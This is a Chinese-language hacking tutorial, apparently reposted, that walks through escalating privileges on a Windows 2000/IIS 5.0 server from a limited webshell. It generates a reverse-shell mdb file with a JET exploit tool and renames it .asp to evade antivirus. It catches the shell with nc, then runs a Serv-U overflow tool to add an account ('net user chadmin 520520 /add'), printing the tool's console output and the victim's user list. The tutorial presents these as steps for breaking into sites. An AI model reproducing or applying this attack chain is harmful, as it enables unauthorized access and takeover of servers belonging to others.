天天看点

jet exploit配合WEBSHELL提升权限

<a href="http://www.3800hk.com/news/w31/17410.html">http://www.3800hk.com/news/w31/17410.html</a>

目标站点是WINDOWS SERVER 2000系统,IIS 5.0 Wscript.shell  shell.application  Wscript.network组件全部删除的情况下测试的,要是什么都没删,什么安全也没做,那这次测试也没有什么意义了.

    现在管理员安全意识提高了,搞站越来越难了,往往拿到一个WEBSHELL,就不知道干些什么,除了FSO其他组件都不可以调用,就像这样的。如图1

受影响系统:

Microsoft JET DB

不受影响系统:

Microsoft JET DB OLE Provider

详细描述:

 此信息由HexView提供(EML:[email protected])

    * Microsoft JET 4.00.8618.0 版

    免疫系统:

    * Microsoft JetDB OLE Provider

先用jet.exe生成一个反弹连接的mdb文件如图2

OK现在我们就开始连接我们生成好的文件咯,为了防止被杀毒软件XX我改成ASP后缀了.连接之前我们先得监听好端口哦,哪个端口?就是前面设置的,如图4

现在开始连接我刚刚上传的那个文件.如图5

只要没出现什么灾难性的错误,就表示连接成功了,好,看看我们的NC有反映没有.如图6

成功得到一个CMDSHELL,不过权限是GUESTS组的.这个时候IIS进程已经死了,所有的ASP文件都不可执行了.所以你得提前把你的工具什么的传上去.我之前已经把serv-u溢出程序传上去咯,在c:/winnt/system32/inetsrv/data/目录下 这个目录默认是EVERYONE完全控制的我想大家都知道,我就不多说.因为都做了权限CMDSHELL下根本没法跳到WEB目录.好了,执行我们的SERV-U溢出程序,看看管理员把默认密码改没有,啊哈?溢出成功,如图7

C:/WINNT/system32/inetsrv/Data&gt;ftp 43958 "net user chadmin 520520 /add"

ftp 43958 "net user chadmin 520520 /add"

Serv-u &gt;溢出工具黑猫专版

&lt;220 Serv-U FTP Server v4.0 for WinSock ready...

&gt;USER LocalAdministrator

&lt;331 User name okay, need password.

******************************************************

&lt;230 User logged in, proceed.

&gt;SITE MAINTENANCE

[+] Domain xl:0 Deleted

&lt;505 Domain not found

[+] Creating New Domain...

&lt;200-DomainID=2

[+] Domain xl:2 Created

[+] Creating Evil User

&lt;220 Domain settings saved

200-User=xl

200 User settings saved

[+] Now Exploiting...

&gt;USER xl

&gt;PASS 111111

[+] Now Executing: net user chadmin 520520 /add

&lt;220 Domain deleted

[+] Domain xl:2 Deleted

C:/WINNT/system32/inetsrv/Data&gt;

C:/WINNT/system32/inetsrv/Data&gt;net user

net user

----------------------------------------------------------------

ASPNET                   chadmin                  courses

IUSR_QHMEDIASRV          IWAM_QHMEDIASRV          partner

  SQLDebugger              TsInternetUser

命令成功完成。